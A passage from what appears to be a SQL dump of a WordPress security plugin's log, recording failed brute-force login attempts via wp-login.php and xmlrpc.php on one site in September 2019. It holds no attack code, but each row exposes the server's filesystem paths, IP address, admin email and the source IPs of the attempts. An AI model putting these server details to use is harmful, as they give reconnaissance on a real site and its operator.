04:14:52',17742240,19234088,'https://bintara.com.my/wp-login.php',1,0,'159.253.32.120'),(24895,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"159.253.32.120\";s:11:\"REMOTE_PORT\";s:5:\"60578\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGvP0QGijxhVPhG1M0Q4gAAAA8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568780096.1427\";s:12:\"REQUEST_TIME\";s:10:\"1568780096\";}}','notice','2019-09-18 04:14:58','2019-09-18 04:14:56',18259888,19559368,'https://bintara.com.my/xmlrpc.php',1,0,'159.253.32.120'),(24896,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"178.62.71.94\";s:11:\"REMOTE_PORT\";s:5:\"40236\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGwq61FqYKvioG46Y4hvAAAAIs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568780459.6907\";s:12:\"REQUEST_TIME\";s:10:\"1568780459\";}}','notice','2019-09-18 04:21:01','2019-09-18 04:21:00',17741544,19233288,'https://bintara.com.my/wp-login.php',1,0,'178.62.71.94'),(24897,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"178.62.71.94\";s:11:\"REMOTE_PORT\";s:5:\"41016\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGwsCqbKGlf1IVly7Oa-AAAAVE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568780464.2493\";s:12:\"REQUEST_TIME\";s:10:\"1568780464\";}}','notice','2019-09-18 04:21:05','2019-09-18 04:21:04',18259448,19558040,'https://bintara.com.my/xmlrpc.php',1,0,'178.62.71.94'),(24898,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"151.80.46.95\";s:11:\"REMOTE_PORT\";s:5:\"38568\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGyHCqbKGlf1IVly7ObaQAAAUA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568780828.6308\";s:12:\"REQUEST_TIME\";s:10:\"1568780828\";}}','notice','2019-09-18 04:27:10','2019-09-18 04:27:08',17741496,19233192,'https://bintara.com.my/wp-login.php',1,0,'151.80.46.95'),(24899,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"151.80.46.95\";s:11:\"REMOTE_PORT\";s:5:\"39018\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGyH0QGijxhVPhG1M0RVgAAAAE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568780831.5682\";s:12:\"REQUEST_TIME\";s:10:\"1568780831\";}}','notice','2019-09-18 04:27:13','2019-09-18 04:27:11',18257512,19557776,'https://bintara.com.my/xmlrpc.php',1,0,'151.80.46.95'),(24900,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"167.71.175.204\";s:11:\"REMOTE_PORT\";s:5:\"43378\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGyMiR0vdvYEIduPCLZ5gAAAQY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568780850.1242\";s:12:\"REQUEST_TIME\";s:10:\"1568780850\";}}','notice','2019-09-18 04:27:31','2019-09-18 04:27:30',17741600,19232728,'https://bintara.com.my/wp-login.php',1,0,'167.71.175.204'),(24901,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"167.71.175.204\";s:11:\"REMOTE_PORT\";s:5:\"43788\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGyNK1FqYKvioG46Y4jNgAAAJM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568780853.1075\";s:12:\"REQUEST_TIME\";s:10:\"1568780853\";}}','notice','2019-09-18 04:27:34','2019-09-18 04:27:33',18257560,19556792,'https://bintara.com.my/xmlrpc.php',1,0,'167.71.175.204'),(24902,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"167.99.70.191\";s:11:\"REMOTE_PORT\";s:5:\"48046\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGz1iqbKGlf1IVly7Ob7wAAAUw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568781270.3816\";s:12:\"REQUEST_TIME\";s:10:\"1568781270\";}}','notice','2019-09-18 04:34:31','2019-09-18 04:34:30',17742000,19231664,'https://bintara.com.my/wp-login.php',1,0,'167.99.70.191'),(23696,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"136.144.210.48\";s:11:\"REMOTE_PORT\";s:5:\"60134\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXQf@w4WJcYRwD-bjCNMVgAAAM4\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567891451.7249\";s:12:\"REQUEST_TIME\";s:10:\"1567891451\";}}','notice','2019-09-07 21:24:13','2019-09-07 